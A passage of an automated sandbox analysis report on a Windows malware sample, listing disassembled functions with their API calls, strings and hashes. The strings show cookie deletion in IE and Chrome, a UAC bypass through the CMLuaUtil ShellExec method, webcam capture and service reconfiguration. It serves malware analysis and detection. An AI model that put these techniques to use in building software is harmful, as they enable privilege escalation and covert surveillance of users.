                                              Function 004511AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                              • __alloca_probe_16.LIBCMT ref: 00451231
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                              • __freea.LIBCMT ref: 0045129D
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                              • String ID: v%(/
                                              • API String ID: 313313983-2435473048
                                              • Opcode ID: bc12763b399a6208d318c17ed7bb5e89049be1fb7aa338cc20da594798c3f730
                                              • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                              • Opcode Fuzzy Hash: bc12763b399a6208d318c17ed7bb5e89049be1fb7aa338cc20da594798c3f730
                                              • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                              Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                              • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                              • API String ID: 1133728706-4073444585
                                              • Opcode ID: 931a5b46099edba555754af8d3fc3ae0e9575fe21c51a29e7772e7c1f07a3c17
                                              • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                              • Opcode Fuzzy Hash: 931a5b46099edba555754af8d3fc3ae0e9575fe21c51a29e7772e7c1f07a3c17
                                              • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                              Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f00b1ad24c7174d2716471ab0982682010261559510d9071992da7a4292711ea
                                              • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                              • Opcode Fuzzy Hash: f00b1ad24c7174d2716471ab0982682010261559510d9071992da7a4292711ea
                                              • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                              Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                              • _free.LIBCMT ref: 00450FC8
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 00450FD3
                                              • _free.LIBCMT ref: 00450FDE
                                              • _free.LIBCMT ref: 00451032
                                              • _free.LIBCMT ref: 0045103D
                                              • _free.LIBCMT ref: 00451048
                                              • _free.LIBCMT ref: 00451053
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                              • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                              • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                              Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                              • int.LIBCPMT ref: 004111BE
                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                              • std::_Facet_Register.LIBCPMT ref: 004111FE
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                              • String ID: (mG
                                              • API String ID: 2536120697-4059303827
                                              • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                              • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                              • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                              • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                              Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                              • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                              • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                              • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                              • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                              Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe), ref: 0040760B
                                                • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                              • CoUninitialize.OLE32 ref: 00407664
                                              Strings
                                              • C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, xrefs: 004075EB, 004075EE, 00407640
                                              • [+] ShellExec success, xrefs: 00407649
                                              • [+] before ShellExec, xrefs: 0040762C
                                              • [+] ucmCMLuaUtilShellExecMethod, xrefs: 004075F0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InitializeObjectUninitialize_wcslen
                                              • String ID: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                              • API String ID: 3851391207-2987795546
                                              • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                              • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                              • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                              • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                              Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                              • GetLastError.KERNEL32 ref: 0040BB22
                                              Strings
                                              • UserProfile, xrefs: 0040BAE8
                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                              • [Chrome Cookies not found], xrefs: 0040BB3C
                                              • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                              • API String ID: 2018770650-304995407
                                              • Opcode ID: 40cbd1d017226246a01c6e55be9682f761922b1e96e2188b9bd7b4daff8d9f2f
                                              • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                              • Opcode Fuzzy Hash: 40cbd1d017226246a01c6e55be9682f761922b1e96e2188b9bd7b4daff8d9f2f
                                              • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                              Function 004433DA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll$v%(/
                                              • API String ID: 4061214504-1096476586
                                              • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                              • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                              • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                              • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                              Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              • __allrem.LIBCMT ref: 0043ACE9
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                              • __allrem.LIBCMT ref: 0043AD1C
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                              • __allrem.LIBCMT ref: 0043AD51
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                              • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                              • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                              • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                              Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologSleep
                                              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                              • API String ID: 3469354165-3054508432
                                              • Opcode ID: fef66e343663587799a4fb7e411b7be832f70b8e55665d4bb62892141d3c40a9
                                              • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                              • Opcode Fuzzy Hash: fef66e343663587799a4fb7e411b7be832f70b8e55665d4bb62892141d3c40a9
                                              • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                              Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                              • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                              • String ID:
                                              • API String ID: 3950776272-0
                                              • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                              • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                              • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                              • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                              Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __cftoe
                                              • String ID:
                                              • API String ID: 4189289331-0
                                              • Opcode ID: d4cf2da0f410fbcc7cbee81c0db44e16d3fe49bd9b5005f3a7d0ddff8059c7c7
                                              • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                              • Opcode Fuzzy Hash: d4cf2da0f410fbcc7cbee81c0db44e16d3fe49bd9b5005f3a7d0ddff8059c7c7
                                              • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                              Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                              • String ID:
